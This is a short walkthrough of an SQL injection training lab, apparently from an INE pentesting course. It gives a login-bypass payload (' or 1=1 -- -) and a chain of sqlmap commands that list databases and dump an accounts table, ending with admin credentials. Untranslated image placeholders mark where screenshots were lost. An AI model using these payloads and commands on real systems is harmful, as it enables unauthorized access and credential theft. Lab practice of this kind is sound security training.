Road to Pentester – INE Lab – Sql Injection

Lab Intro

In this lab you can practice the SQL Injection techniques and tools studied during the course. You can access the target web application at the following address

The goal of this lab is to test the web application in order to find all the vulnerable injection points. Once you find them, you should be able to dump all the data and successfully log into the web application.


First login with as email, and test as password.

The page says go away!

Try sql injection in password field by single quote '.

Single quote caused some error. We assume that the password field is subject to sql injection.
Try enter ' or 1=1 -- - in password field and log in.

在这里插入图片描述Successfully bypassed login authentication.

Further Exploit By Sqlmap

By clicking around, no more user input forms can be found on the site. The next step should be to further exploit the filed with sqlmap.

First, intercept the login request.

在这里插入图片描述The request body And the page is login.php.

Copy the request to file.

Then fire up sqlmap to exploit the target.

sqlmap -r req.txt -p password

After a while, sqlmap reports that password field is injectable.
Let's find out the databases.

sqlmap -r req.txt -p password --dbms=mysql --dbs

Server info found.
在这里插入图片描述Databases found.

Dumping tables from awd.

sqlmap -r req.txt -p password --dbms=mysql -D awd --tables

Next step, dump details from accounts table.

sqlmap -r req.txt -p password --dbms=mysql -D awd -T account --dump

Time based technique takes too much time. Change to Boolean and have another try.

Retrieved admin account.
在这里插入图片描述I don't want to wait for too long, I've got the admin account and the password.



The url from the news link is vulnerable too. Exploiting that url is much faster.